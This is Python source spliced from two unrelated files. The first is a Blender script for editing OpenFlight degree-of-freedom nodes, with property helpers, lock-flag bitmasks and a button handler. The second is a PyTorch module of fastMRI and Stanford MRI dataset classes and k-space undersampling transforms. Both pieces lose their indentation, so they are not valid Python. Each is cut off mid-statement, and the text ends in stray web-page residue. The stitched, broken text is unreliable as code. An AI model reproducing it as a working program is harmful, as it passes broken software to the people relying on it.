	# object when no argument is given. (idprops_copy calls this with an
	# argument, which used to raise TypeError.)
	if object is None:
		state = update_state()
		object = state["activeObject"]
	if object and object.properties.has_key('FLT'):
		object.properties.pop('FLT')
def idprops_copy(source):
	"""Copy source's FLT ID properties onto every other selected object on a
	visible layer, replacing any FLT properties they already had."""
	state = update_state()
	if source.properties.has_key('FLT'):
		for object in state["activeScene"].objects:
			if object.sel and object != source and (state["activeScene"].Layers & object.Layers):
				# bug fix: the original called idprops_kill(object), but
				# idprops_kill() took no arguments, so this branch always
				# raised TypeError. Clear the target's FLT block directly.
				if object.properties.has_key('FLT'):
					object.properties.pop('FLT')
				object.properties['FLT'] = dict()
				for key in source.properties['FLT']:
					object.properties['FLT'][key] = source.properties['FLT'][key]
def select_by_typecode(typecode):
	"""Select every object on a visible layer whose FLT 'type' equals typecode."""
	state = update_state()
	scene = state["activeScene"]
	for candidate in scene.objects:
		props = candidate.properties
		if props.has_key('FLT') and props['FLT']['type'] == typecode and (scene.Layers & candidate.Layers):
			candidate.select(1)
def DOF_get_frame():
	"""Write the active DOF node's world-space origin, X-axis point and
	X/Y-plane point into its FLT ID properties.

	Warning! assumes 1 BU == 10 meters.
	"""
	state = update_state()
	actobj = state["activeObject"]
	# bug fix: the original guard was `not actobj and not id_props_type(...)`,
	# which misspelled idprops_type (NameError when reached) and with `and`
	# still fell through for a non-DOF active object. Bail out unless we have
	# an active object that is a DOF node (typecode 14).
	if not actobj or not idprops_type(actobj, 14):
		return
	props = actobj.properties['FLT']
	#do origin
	loc = actobj.getLocation('worldspace')
	props['5d!ORIGX'] = loc[0] * 10.0
	props['6d!ORIGY'] = loc[1] * 10.0
	props['7d!ORIGZ'] = loc[2] * 10.0
	#do X axis
	x = Blender.Mathutils.Vector(1.0, 0.0, 0.0)
	x = x * actobj.getMatrix('worldspace')
	x = x * 10.0
	props['8d!XAXIS-X'] = x[0]
	props['9d!XAXIS-Y'] = x[1]
	props['10d!XAXIS-Z'] = x[2]
	#do X/Y plane
	y = Blender.Mathutils.Vector(0.0, 1.0, 0.0)
	y.normalize()
	y = y * actobj.getMatrix('worldspace')
	y = y * 10.0
	props['11d!XYPLANE-X'] = y[0]
	props['12d!XYPLANE-Y'] = y[1]
	# NOTE(review): key '13d!XZPLANE-Z' looks inconsistent with the XYPLANE
	# keys above — confirm against flt_properties.FLTDOF before renaming.
	props['13d!XZPLANE-Z'] = y[2]
def idprops_type(object, typecode):
	"""Return True when the object carries FLT ID properties whose 'type'
	equals typecode, else False."""
	props = object.properties
	if not props.has_key('FLT'):
		return False
	flt = props['FLT']
	return bool(flt.has_key('type') and flt['type'] == typecode)
#ui type code
def get_prop(typecode, prop):
	"""Read `prop` from the active object's FLT properties when it is a node
	of the given typecode; otherwise fall back to the FLTDOF defaults."""
	state = update_state()
	active = state["activeObject"]
	if active and idprops_type(active, typecode):
		return active.properties['FLT'][prop]
	return flt_properties.FLTDOF[prop]
def set_prop(typecode, prop, value):
	"""Write `prop` on the active object's FLT properties, but only when the
	active object is a node of the given typecode; otherwise do nothing."""
	state = update_state()
	active = state["activeObject"]
	if not active:
		return
	if idprops_type(active, typecode):
		active.properties['FLT'][prop] = value
# Bit masks for the per-channel limit flags inside the DOF record's
# '50I!FLAG' word (one bit per translation/rotation/scale axis).
lockxtrans = (1 << 31)
lockytrans = (1 << 30)
lockztrans = (1 << 29)
lockxrot = (1 << 28)
lockyrot = (1 << 27)
lockzrot = (1 << 26)
lockxscale = (1 << 25)
lockyscale = (1 << 24)
lockzscale = (1 << 23)
def get_lockmask(mask):
	"""Return True when the active DOF node's '50I!FLAG' word has `mask` set."""
	state = update_state()
	if not state["activeObject"]:
		return False
	flag = get_prop(14, '50I!FLAG')
	return bool(flag & mask)
def set_lockmask(mask):
	# Set `mask` bits in the active DOF node's '50I!FLAG' word. The flag is
	# stored as a signed 32-bit int, so round-trip through struct to perform
	# the OR on its unsigned reinterpretation and store it back signed.
	# NOTE(review): relies on the stdlib `struct` module being importable at
	# module scope — confirm it is imported in this file.
	state = update_state()
	if state["activeObject"] and idprops_type(state["activeObject"], 14):
		oldvalue = state["activeObject"].properties['FLT']['50I!FLAG']
		# signed -> unsigned
		oldvalue = struct.unpack('>I', struct.pack('>i', oldvalue))[0]
		oldvalue |= mask
		# unsigned -> signed for storage
		state["activeObject"].properties['FLT']['50I!FLAG'] = struct.unpack('>i', struct.pack(">I", oldvalue))[0]
def clear_lockmask(mask):
	# Clear `mask` bits in the active DOF node's '50I!FLAG' word; same
	# signed/unsigned struct round-trip as set_lockmask.
	state = update_state()
	if state["activeObject"] and idprops_type(state["activeObject"], 14):
		oldvalue = state["activeObject"].properties['FLT']['50I!FLAG']
		# signed -> unsigned
		oldvalue = struct.unpack('>I', struct.pack('>i', oldvalue))[0]
		oldvalue &= ~mask
		# unsigned -> signed for storage
		state["activeObject"].properties['FLT']['50I!FLAG'] = struct.unpack('>i',struct.pack('>I',oldvalue))[0]
def create_dof():
	"""Turn the active object into an FLT DOF node (typecode 14), replacing
	any existing FLT properties, and capture its current frame."""
	state = update_state()
	actobj = state["activeObject"]
	# nothing to do without an active object, or if it is already a DOF node
	if not actobj or idprops_type(actobj, 14):
		return
	idprops_kill()
	idprops_append(actobj, 14, flt_properties.FLTDOF)
	DOF_get_frame()
def event(evt, val):
	"""Keyboard/mouse handler: ESC closes the editor."""
	if evt != Draw.ESCKEY:
		return
	Draw.Exit()
def but_event(evt):
	"""Button event dispatcher.

	Applies the widget change identified by `evt` to the active DOF node:
	make/update/delete the node, toggle per-axis limit flags in the
	'50I!FLAG' word, or write min/max/step values into the matching FLT
	ID property. Always finishes with a redraw.
	"""
	global DOF_MAKE
	global DOF_UPDATE
	global DOF_DELETE
	global DOF_TRANSX
	global DOF_TRANSY
	global DOF_TRANSZ
	global DOF_ROTX
	global DOF_ROTY
	global DOF_ROTZ
	global DOF_SCALEX
	global DOF_SCALEY
	global DOF_SCALEZ
	global DOF_MIN_TRANSX
	global DOF_MIN_TRANSY
	global DOF_MIN_TRANSZ
	global DOF_MIN_ROTX
	global DOF_MIN_ROTY
	global DOF_MIN_ROTZ
	global DOF_MIN_SCALEX
	global DOF_MIN_SCALEY
	global DOF_MIN_SCALEZ
	global DOF_MAX_TRANSX
	global DOF_MAX_TRANSY
	global DOF_MAX_TRANSZ
	global DOF_MAX_ROTX
	global DOF_MAX_ROTY
	global DOF_MAX_ROTZ
	global DOF_MAX_SCALEX
	global DOF_MAX_SCALEY
	global DOF_MAX_SCALEZ
	global DOF_STEP_TRANSX
	global DOF_STEP_TRANSY
	global DOF_STEP_TRANSZ
	global DOF_STEP_ROTX
	global DOF_STEP_ROTY
	global DOF_STEP_ROTZ
	global DOF_STEP_SCALEX
	global DOF_STEP_SCALEY
	global DOF_STEP_SCALEZ
	#labels
	global DOF_ROTSTRING
	global DOF_TRANSTRING
	global DOF_SCALESTRING
	#masks
	global lockxtrans
	global lockytrans
	global lockztrans
	global lockxrot
	global lockyrot
	global lockzrot
	global lockxscale
	global lockyscale
	global lockzscale
	global zmin
	global zmax
	global zcur
	global zstep
	global ymin
	global ymax
	global ycur
	global ystep
	global xmin
	global xmax
	global xcur
	global xstep
	global pitchmin
	global pitchmax
	global pitchcur
	global pitchstep
	global rollmin
	global rollmax
	global rollcur
	global rollstep
	global yawmin
	global yawmax
	global yawcur
	global yawstep
	global zscalemin
	global zscalemax
	global zscalecur
	global zscalestep
	global yscalemin
	global yscalemax
	global yscalecur
	global yscalestep
	global xscalemin
	global xscalemax
	global xscalecur
	global xscalestep
	#do "system" events (create/refresh/delete the DOF node)
	if evt == evcode["DOF_MAKE"]:
		create_dof()
	if evt == evcode["DOF_UPDATE"]:
		DOF_get_frame()
	if evt == evcode["DOF_DELETE"]:
		idprops_kill()
	#do translation lock events (toggle widgets mirror flag bits)
	if evt == evcode["DOF_TRANSX"]:
		if DOF_TRANSX.val == True:
			set_lockmask(lockxtrans)
		else:
			clear_lockmask(lockxtrans)
	if evt == evcode["DOF_TRANSY"]:
		if DOF_TRANSY.val == True:
			set_lockmask(lockytrans)
		else:
			clear_lockmask(lockytrans)
	if evt == evcode["DOF_TRANSZ"]:
		if DOF_TRANSZ.val == True:
			set_lockmask(lockztrans)
		else:
			clear_lockmask(lockztrans)
	#do rotation lock events
	if evt == evcode["DOF_ROTX"]:
		if DOF_ROTX.val == True:
			set_lockmask(lockxrot)
		else:
			clear_lockmask(lockxrot)
	if evt == evcode["DOF_ROTY"]:
		if DOF_ROTY.val == True:
			set_lockmask(lockyrot)
		else:
			clear_lockmask(lockyrot)
	if evt == evcode["DOF_ROTZ"]:
		if DOF_ROTZ.val == True:
			set_lockmask(lockzrot)
		else:
			clear_lockmask(lockzrot)
	#do scale lock events
	if evt == evcode["DOF_SCALEX"]:
		if DOF_SCALEX.val == True:
			set_lockmask(lockxscale)
		else:
			clear_lockmask(lockxscale)
	if evt == evcode["DOF_SCALEY"]:
		if DOF_SCALEY.val == True:
			set_lockmask(lockyscale)
		else:
			clear_lockmask(lockyscale)
	if evt == evcode["DOF_SCALEZ"]:
		if DOF_SCALEZ.val == True:
			set_lockmask(lockzscale)
		else:
			clear_lockmask(lockzscale)
	#do translation buttons (write the widget value into the FLT property)
	if evt == evcode["DOF_MIN_TRANSX"]:
		set_prop(14, xmin, DOF_MIN_TRANSX.val)
	if evt == evcode["DOF_MAX_TRANSX"]:
		set_prop(14,xmax, DOF_MAX_TRANSX.val)
	if evt == evcode["DOF_STEP_TRANSX"]:
		set_prop(14,xstep, DOF_STEP_TRANSX.val)
	if evt == evcode["DOF_MIN_TRANSY"]:
		set_prop(14, ymin, DOF_MIN_TRANSY.val)
	if evt == evcode["DOF_MAX_TRANSY"]:
		set_prop(14,ymax, DOF_MAX_TRANSY.val)
	if evt == evcode["DOF_STEP_TRANSY"]:
		set_prop(14,ystep, DOF_STEP_TRANSY.val)
	if evt == evcode["DOF_MIN_TRANSZ"]:
		set_prop(14, zmin, DOF_MIN_TRANSZ.val)
	if evt == evcode["DOF_MAX_TRANSZ"]:
		set_prop(14, zmax, DOF_MAX_TRANSZ.val)
	if evt == evcode["DOF_STEP_TRANSZ"]:
		set_prop(14, zstep, DOF_STEP_TRANSZ.val)
	#do rotation buttons
	if evt == evcode["DOF_MIN_ROTX"]:
		set_prop(14, pitchmin, DOF_MIN_ROTX.val)
	if evt == evcode["DOF_MAX_ROTX"]:
		set_prop(14, pitchmax, DOF_MAX_ROTX.val)
	if evt == evcode["DOF_STEP_ROTX"]:
		set_prop(14, pitchstep, DOF_STEP_ROTX.val)
	if evt == evcode["DOF_MIN_ROTY"]:
		set_prop(14, rollmin, DOF_MIN_ROTY.val)
	if evt == evcode["DOF_MAX_ROTY"]:
		set_prop(14, rollmax, DOF_MAX_ROTY.val)
	if evt == evcode["DOF_STEP_ROTY"]:
		set_prop(14, rollstep, DOF_STEP_ROTY.val)
	if evt == evcode["DOF_MIN_ROTZ"]:
		set_prop(14, yawmin, DOF_MIN_ROTZ.val)
	if evt == evcode["DOF_MAX_ROTZ"]:
		set_prop(14, yawmax, DOF_MAX_ROTZ.val)
	if evt == evcode["DOF_STEP_ROTZ"]:
		set_prop(14, yawstep, DOF_STEP_ROTZ.val)
	#do scale buttons
	if evt == evcode["DOF_MIN_SCALEX"]:
		set_prop(14, xscalemin, DOF_MIN_SCALEX.val)
	if evt == evcode["DOF_MAX_SCALEX"]:
		set_prop(14, xscalemax, DOF_MAX_SCALEX.val)
	if evt == evcode["DOF_STEP_SCALEX"]:
		set_prop(14, xscalestep, DOF_STEP_SCALEX.val)
	if evt == evcode["DOF_MIN_SCALEY"]:
		set_prop(14, yscalemin, DOF_MIN_SCALEY.val)
	if evt == evcode["DOF_MAX_SCALEY"]:
		set_prop(14, yscalemax, DOF_MAX_SCALEY.val)
	if evt == evcode["DOF_STEP_SCALEY"]:
		set_prop(14, yscalestep, DOF_STEP_SCALEY.val)
	if evt == evcode["DOF_MIN_SCALEZ"]:
		set_prop(14, zscalemin, DOF_MIN_SCALEZ.val)
	if evt == evcode["DOF_MAX_SCALEZ"]:
		set_prop(14, zscalemax, DOF_MAX_SCALEZ.val)
	if evt == evcode["DOF_STEP_SCALEZ"]:
		set_prop(14, zscalestep, DOF_STEP_SCALEZ.val)
	Draw.Redraw(1)
	Blender.Window.RedrawAll()
def draw_propsheet(x,y):
#UI buttons
global DOF_MAKE
global DOF_UPDATE
global DOF_DELETE
global DOF_TRANSX
global DOF_TRANSY
global DOF_TRANSZ
global DOF_ROTX
global DOF_ROTY
global DOF_ROTZ
global DOF_SCALEX
global DOF_SCALEY
global DOF_SCALEZ
global DOF_MIN_TRANSX
global DOF_MIN_TRANSY
global DOF_MIN_TRANSZ
global DOF_MIN_ROTX
global DOF_MIN_ROTY
global DOF_MIN_ROTZ
global DOF_MIN_SCALEX
global DOF_MIN_SCALEY
global DOF_MIN_SCALEZ
global DOF_MAX_TRANSX
global DOF_MAX_TRANSY
global DOF_MAX_TRANSZ
global DOF_MAX_ROTX
global DOF_MAX_ROTY
global DOF_MAX_ROTZ
global DOF_MAX_SCALEX
global DOF_MAX_SCALEY
global DOF_MAX_SCALEZ
global DOF_STEP_TRANSX
global DOF_STEP_TRANSY
global DOF_STEP_TRANSZ
global DOF_STEP_ROTX
global DOF_STEP_ROTY
global DOF_STEP_ROTZ
global DOF_STEP_SCALEX
global DOF_STEP_SCALEY
global DOF_STEP_SCALEZ
#labels
global DOF_ROTSTRING
global DOF_TRANSTRING
global DOF_SCALESTRING
global DOF_EDITLABEL
#masks
global lockxtrans
global lockytrans
global lockztrans
global lockxrot
global lockyrot
global lockzrot
global lockxscale
global lockyscale
global lockzscale
global zmin
global zmax
global zcur
global zstep
global ymin
global ymax
global ycur
global ystep
global xmin
global xmax
global xcur
global xstep
global pitchmin
global pitchmax
global pitchcur
global pitchstep
global rollmin
global rollmax
global rollcur
global rollstep
global yawmin
global yawmax
global yawcur
global yawstep
global zscalemin
global zscalemax
global zscalecur
global zscalestep
global yscalemin
global yscalemax
global yscalecur
global yscalestep
global xscalemin
global xscalemax
global xscalecur
global xscalestep
global evcode
state = update_state()
row_height = 20
toggle_width = 50
input_width = 100
pad = 10
origx = x
origy = (row_height * 15) + (pad * 15)
#editor label
x = origx
y = origy
#y = y - (row_height + pad)
DOF_EDITLABEL = Blender.Draw.Label("FLT Degree of Freedom Editor", x, y, 200, row_height)
#draw Translation limits
x = origx
y = y- (row_height + pad)
DOF_TRANSTRING = Blender.Draw.Label("Translation Limits", x, y, input_width, row_height)
#X limits
x = origx
y = y- (row_height + pad)
DOF_TRANSX = Blender.Draw.Toggle("LimX", evcode["DOF_TRANSX"], x, y, toggle_width, row_height, get_lockmask(lockxtrans), "")
x = x + (toggle_width + pad)
DOF_MIN_TRANSX = Blender.Draw.Number("MinX", evcode["DOF_MIN_TRANSX"], x, y, input_width, row_height,get_prop(14,xmin), -1000000.0, 1000000.0, "")
x = x + (input_width + pad)
DOF_MAX_TRANSX = Blender.Draw.Number("MaxX", evcode["DOF_MAX_TRANSX"], x, y, input_width, row_height,get_prop(14,xmax), -1000000.0, 1000000.0, "")
x = x + (input_width + pad)
DOF_STEP_TRANSX = Blender.Draw.Number("StepX", evcode["DOF_STEP_TRANSX"], x, y, input_width, row_height,get_prop(14,xstep), -1000000.0, 1000000.0, "")
#Y limits
x = origx
y = y- (row_height + pad)
DOF_TRANSY = Blender.Draw.Toggle("LimY", evcode["DOF_TRANSY"], x, y, toggle_width, row_height, get_lockmask(lockytrans), "")
x = x + (toggle_width + pad)
DOF_MIN_TRANSY = Blender.Draw.Number("MinY", evcode["DOF_MIN_TRANSY"], x, y, input_width, row_height, get_prop(14,ymin), -1000000.0, 1000000.0, "")
x = x + (input_width + pad)
DOF_MAX_TRANSY = Blender.Draw.Number("MaxY", | |
import numpy as np
import os
import pickle
from typing import Dict, Optional, Tuple, Union, Mapping, Callable, Set
import torch
from torch.utils.data import Dataset, DataLoader
from torchvision.transforms import RandomCrop
from fastmri import complex_abs, ifft2c
from fastmri.data import SliceDataset
from fastmri.data import transforms as T
from fastmri.data.subsample import RandomMaskFunc, create_mask_for_mask_type
from kernprior import paths
from kernprior import transforms
from kernprior import utils
class FastMRIDataset(SliceDataset):
    """
    fastMRI Dataset (https://fastmri.org/dataset/).
    """
    def __init__(
        self,
        mid_slice_range: Optional[int] = None,
        acquisition: Optional[str] = None,
        subset: Optional[set] = None,
        adversarially_filtered: bool = False,
        **kwargs,
    ):
        """
        Args:
            mid_slice_range: Optional; If given, keep only the middle slice +/- mid_slice_range
                of each volume.
            acquisition: Optional; If given, keep only examples of this acquisition type
                ('including_fat' or 'excluding_fat' for knees).
            subset: Optional; If given, keep only files whose name appears in subset.
            adversarially_filtered: Optional; If True, keep only files from the fastMRI-A dataset
                (see https://arxiv.org/abs/2102.06103).
            kwargs: Keyword arguments are passed to fastmri.data.SliceDataset.
        """
        super().__init__(**kwargs)
        # self.examples holds tuples of 3 elements: (file_path, slice_num, metadata)
        if mid_slice_range is not None:
            mid_indices = self._get_file_path_to_mid_slice_indices(mid_slice_range)
            self.examples = [
                example for example in self.examples
                if example[1] in mid_indices[example[0]]
            ]
        if acquisition:
            acquisitions = self._get_file_path_to_acquisition()
            self.examples = [
                example for example in self.examples
                if acquisitions[example[0]] == acquisition
            ]
        if subset:
            self.examples = [example for example in self.examples if example[0].name in subset]
        if adversarially_filtered:
            fastmri_a = get_fastmri_a_dataset()
            self.examples = [
                example for example in self.examples
                if (example[0].name, example[1]) in fastmri_a
            ]
    def _get_file_path_to_mid_slice_indices(self, mid_slice_range: int):
        """Map every file path in self.examples to the set of its middle-slice indices."""
        mid_slice_indices = {}
        for example in self.examples:
            path = example[0]
            if path in mid_slice_indices:
                continue  # already computed for this volume
            num_slices = utils.get_num_slices(path)
            mid_slice_indices[path] = set(utils.get_mid_slice_indices(num_slices, mid_slice_range))
        return mid_slice_indices
    def _get_file_path_to_acquisition(self):
        """Map every file path in self.examples to its acquisition type."""
        acquisitions = {}
        for example in self.examples:
            path = example[0]
            if path not in acquisitions:
                acquisitions[path] = utils.get_acquisition(path)
        return acquisitions
class StanfordDataset(Dataset):
    """
    Stanford Dataset (collected by Darestani et al. https://arxiv.org/abs/2102.06103).
    """
    def __init__(self, root: str, transform: Optional[Callable] = None, download: bool = False):
        """
        Args:
            root: Path to the dataset.
            transform: Optional; A callable object that pre-processes the data. The transform should take
                'file_name', 'kspace', 'target' as inputs.
            download: Optional; If True, downloads the dataset and saves it at root.
                If the dataset is already downloaded, it is not downloaded again.
        """
        self.root = root
        self.transform = transform
        self.examples = []
        if not os.path.exists(self.root):
            if not download:
                raise RuntimeError('Dataset not found. Use download=True to download.')
            utils.download(url='https://rice.box.com/shared/static/4xk6nef26vk8uyes4wymtob5pbmcfdyd',
                           save_path=self.root)
        # NOTE(review): unpickles the dataset file; pickle.load is only safe on trusted data.
        with open(self.root, 'rb') as f:
            dataset = pickle.load(f)
        self.examples = [
            (file_name, sample['kspace'], sample['reconstruction_rss'])
            for file_name, sample in dataset.items()
        ]
    def __len__(self):
        """Return the number of examples in the dataset."""
        return len(self.examples)
    def __getitem__(self, i: int):
        """Return example i, passed through self.transform if one was provided."""
        example = self.examples[i]
        return example if self.transform is None else self.transform(*example)
class TrainDataTransform:
    """
    Data transform for training a flow-based prior on patches of MRI data. Used as 'transform' for FastMRIDataset.
    """
    def __init__(
        self,
        patch_size: Union[int, Tuple[int], Tuple[int, int]],
        challenge: str,
        sens_params: str,
        reduce_precise: bool,
    ):
        """
        Args:
            patch_size: The patch size of the prior.
            challenge: One of ('singlecoil', 'multicoil').
            sens_params: Parameters that get directly passed to ecalib from the Bart toolbox.
                See utils.get_sens_maps for details.
            reduce_precise: Whether to replace the magnitude of the MVUE image with the RSS estimate. Only relevant
                if challenge == 'multicoil'.
        """
        self.random_crop = RandomCrop(patch_size)
        self.challenge = challenge
        self.sens_params = sens_params
        self.center_crop_size = (320, 320)
        self.reduce_precise = reduce_precise
    def __call__(
        self,
        kspace: np.ndarray,
        mask: np.ndarray,
        target: np.ndarray,
        attrs: Dict,
        file_name: str,
        slice_num: int,
    ) -> Tuple[torch.Tensor, int]:
        """
        Args:
            kspace: kspace of shape (num_coils, H, W) for multi-coil data or (H, W) for single-coil data.
            mask: Mask from the test dataset (unused here).
            target: Target image (unused here; the target is recomputed from kspace).
            attrs: Acquisition related information stored in the HDF5 object (unused here).
            file_name: File name.
            slice_num: Index of the slice.
        Returns:
            tuple containing:
                patch: Complex-valued patch of shape (2, patch_H, patch_W), i.e. real and imaginary dims are stacked as
                    channel dim.
                slice_num: Index of the slice.
        Notes:
            Docstring based on https://github.com/facebookresearch/fastMRI/blob/master/fastmri/data/transforms.py
        """
        kspace = T.to_tensor(kspace)
        image = T.complex_center_crop(ifft2c(kspace), self.center_crop_size)
        if self.challenge == 'multicoil':
            # collapse the per-coil images into a single complex-valued image via sensitivity maps
            sens_maps = utils.get_cached_sens_maps(kspace, file_name, slice_num, self.sens_params)
            sens_maps = T.complex_center_crop(sens_maps, self.center_crop_size)
            reduce_fn = transforms.sens_reduce_precise if self.reduce_precise else transforms.sens_reduce
            image = reduce_fn(image, sens_maps)
        image = image / complex_abs(image).max()  # normalize to unit max magnitude
        image = image.permute(2, 0, 1)  # move the complex (real/imag) dim to the channel dim
        return self.random_crop(image), slice_num
class InferenceDataTransform:
    """
    Data transform for obtaining undersampled kspace slices.
    """
    def __init__(
        self,
        mask_type: str,
        acceleration: int,
        center_fraction: float,
        challenge: str,
        crop_size: Union[utils.CropSize, Mapping[str, utils.CropSize]],
        normalize: bool,
        pad_sides: bool = False,
        use_seed: bool = True,
    ):
        """
        Args:
            mask_type: One of ('random', 'equispaced').
            acceleration: The desired undersampling factor.
            center_fraction: Fraction of low-frequency columns to be retained.
            challenge: One of ('singlecoil', 'multicoil').
            crop_size: The kspace is spatially cropped to crop_size before undersampling. If a dimension of crop_size is
                None, the kspace does not get cropped in this dimension. If crop_size is a Dict, it should map from
                'including_fat' and 'excluding_fat' to a crop_size to use for the respective acquisition type.
            normalize: Whether to divide the kspace by the maximum pixel value of the zero-filled reconstruction.
            pad_sides: Optional; Whether to pad the sides of the kspace with zeros.
            use_seed: Optional; Whether to seed the random number generator used for creating the mask based on the file_name.
        """
        self.acceleration = acceleration
        self.challenge = challenge
        self.crop_size = crop_size
        self.normalize = normalize
        self.pad_sides = pad_sides
        self.use_seed = use_seed
        self.mask_func = create_mask_for_mask_type(mask_type,
                                                   accelerations=[acceleration],
                                                   center_fractions=[center_fraction])
    def __call__(
        self,
        kspace: np.ndarray,
        mask: Optional[np.ndarray] = None,
        target: Optional[np.ndarray] = None,
        attrs: Optional[Dict] = None,
        file_name: Optional[str] = None,
        slice_num: Optional[int] = None
    ) -> Tuple[torch.Tensor, torch.Tensor, Optional[torch.Tensor], Optional[str], Optional[int], Optional[str]]:
        """
        Args:
            kspace: kspace of shape (num_coils, H, W) for multi-coil data or (H, W) for single-coil data.
            mask: Optional; Mask from the test dataset (unused; a fresh mask is generated).
            target: Optional; Target image.
            attrs: Optional; Acquisition related information stored in the HDF5 object.
            file_name: Optional; File name.
            slice_num: Optional; Index of the slice.
        Returns:
            tuple containing:
                masked_kspace: Undersampled kspace.
                mask: Undersampling mask used to obtain masked_kspace.
                target: Target image.
                file_name: File name.
                slice_num: Index of the slice.
                acquisition: The acquisition type of the measurement.
        Notes:
            Docstring based on https://github.com/facebookresearch/fastMRI/blob/master/fastmri/data/transforms.py
        """
        kspace = T.to_tensor(kspace)
        if target is not None:
            target = T.to_tensor(target)
        uncropped_shape = kspace.shape
        acquisition = utils.from_confusing_terminology(attrs['acquisition']) if attrs else None
        # resolve the crop size, possibly per acquisition type
        if isinstance(self.crop_size, dict):
            key = acquisition if acquisition == 'including_fat' else 'excluding_fat'
            crop_size = self.crop_size[key]
        else:
            crop_size = self.crop_size
        if crop_size is not None:
            crop_size = utils.get_crop_size(crop_size, kspace.shape)
            kspace = transforms.crop_spatially(kspace, crop_size)
        # only pad if the width dimension was not cropped
        if self.pad_sides and kspace.shape[-2] == uncropped_shape[-2]:
            padding = (attrs['padding_left'], attrs['padding_right'])
        else:
            padding = None
        seed = utils.get_seed(file_name) if self.use_seed else None
        masked_kspace, mask = T.apply_mask(kspace, self.mask_func, seed, padding)
        if self.normalize:
            masked_kspace = transforms.normalize_kspace(masked_kspace, self.challenge)
        return masked_kspace, mask, target, file_name, slice_num, acquisition
class StanfordDataTransform:
    """
    Data transform for obtaining undersampled kspace slices from the StanfordDataset.
    """
    def __init__(self, acceleration: int, center_fraction: float, normalize: bool, use_seed: bool = True):
        """
        Args:
            acceleration: The desired undersampling factor.
            center_fraction: Fraction of low-frequency columns to be retained.
            normalize: Whether to divide the kspace by the maximum pixel value of the zero-filled reconstruction.
            use_seed: Optional; Whether to seed the random number generator used for creating the mask based on the file_name.
        """
        self.acceleration = acceleration
        self.normalize = normalize
        self.use_seed = use_seed
        self.mask_func = RandomMaskFunc(accelerations=[acceleration], center_fractions=[center_fraction])
    def __call__(
        self,
        file_name: str,
        kspace: np.ndarray,
        target: np.ndarray
    ) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor, str, int, str]:
        """
        Args:
            file_name: File name.
            kspace: kspace of shape (num_coils, H, W).
            target: Target image.
        Returns:
            tuple containing:
                masked_kspace: Undersampled kspace.
                mask: Undersampling mask used to obtain masked_kspace.
                target: Target image.
                file_name: File name.
                slice_num: Index of the slice (-1; included for compatibility with the fastMRI dataset).
                acquisition: Indicates that a sample from the Stanford dataset is returned.
        """
        # rotate kspace and target into the fastMRI orientation
        kspace = T.to_tensor(kspace).rot90(1, dims=(-3, -2))
        target = T.to_tensor(target).rot90(1, dims=(0, 1))
        seed = utils.get_seed(file_name) if self.use_seed else None
        masked_kspace, mask = T.apply_mask(kspace, self.mask_func, seed)
        if self.normalize:
            masked_kspace = transforms.normalize_kspace(masked_kspace, 'multicoil')
        return masked_kspace, mask, target, file_name, -1, 'stanford'
def get_dataloader_train(args, data_dependent_init=False):
"""Based on https://github.com/kamenbliznashki/normalizing_flows"""
dataset = get_mri_dataset_train(args)
batch_size = |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.